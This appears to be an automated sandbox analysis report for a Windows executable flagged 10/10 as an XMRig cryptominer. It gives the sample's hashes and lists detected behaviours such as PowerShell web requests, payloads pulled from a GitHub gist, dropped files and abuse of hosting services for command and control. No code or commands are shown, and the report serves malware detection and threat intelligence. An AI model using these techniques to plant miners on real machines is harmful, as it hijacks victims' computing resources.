Overview

overview

10

Static

static

10

8b3be07cd0...f8.exe

windows7-x64

10

8b3be07cd0...f8.exe

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    8b3be07cd0133d5e97281f764b5f7b6ba59563438b0ef75e2958bda83c0891f8

  • Size

    1.9MB

  • Sample

    240510-aah77aef8x

  • MD5

    610762c5b8d40c7bd7586439a6c28bb5

  • SHA1

    00ef8c785ba01e71fd97b315584fcf95db9464c0

  • SHA256

    8b3be07cd0133d5e97281f764b5f7b6ba59563438b0ef75e2958bda83c0891f8

  • SHA512

    767a4370d490d4f429fecc44e9fc6eaf7e60b0510b334b74d04df1c99573273f316cbeec37b1bd051e1a93285588bebde21abc665643c667b513dc3c18e7149d

  • SSDEEP

    49152:T1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrSax91MkibTIDiH3gPe:T1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rl

Score
10/10
xmrigexecutionminer

Malware Config

Targets

    • Target

      8b3be07cd0133d5e97281f764b5f7b6ba59563438b0ef75e2958bda83c0891f8

    • Size

      1.9MB

    • MD5

      610762c5b8d40c7bd7586439a6c28bb5

    • SHA1

      00ef8c785ba01e71fd97b315584fcf95db9464c0

    • SHA256

      8b3be07cd0133d5e97281f764b5f7b6ba59563438b0ef75e2958bda83c0891f8

    • SHA512

      767a4370d490d4f429fecc44e9fc6eaf7e60b0510b334b74d04df1c99573273f316cbeec37b1bd051e1a93285588bebde21abc665643c667b513dc3c18e7149d

    • SSDEEP

      49152:T1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrSax91MkibTIDiH3gPe:T1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rl

    Score
    10/10
    xmrigexecutionminer

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Detects executables containing URLs to raw contents of a Github gist

    • XMRig Miner payload

      miner

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

      execution

    • Executes dropped EXE

    • Loads dropped DLL

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks